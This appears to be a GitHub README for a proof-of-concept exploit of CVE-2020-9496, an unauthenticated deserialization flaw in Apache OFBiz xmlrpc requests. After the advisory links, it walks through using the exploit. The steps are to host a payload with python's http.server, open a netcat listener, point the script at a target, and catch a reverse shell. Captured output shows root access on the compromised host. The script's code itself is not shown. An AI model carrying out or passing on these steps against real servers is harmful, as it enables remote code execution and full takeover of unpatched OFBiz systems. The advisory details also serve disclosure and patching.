CVE-2020-9496

Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.

Affected Version 17.12.01

Fixed Versions 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's Post: https://issues.apache.org/jira/browse/OFBIZ-11716
Github's POC: https://github.com/g33xter/CVE-2020-9496

In order to make this exploit work, you will need to make the following steps:

Step 1: Host HTTP Service with python3

> sudo python3 -m http.server 80

Step 2: Run nc listener in the desired port (Recommended 8001)

> nc -nlvp 8001

Step 3: Change Website's URL and Port inside the script:

url='https://127.0.0.1' # CHANGE THIS                                                         
port=8443 # CHANGE THIS

Step 4: Run the exploit as shown below

> ./cve-2020-9496.sh -i IP -p PORT

Step 5: Check nc listener

❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01#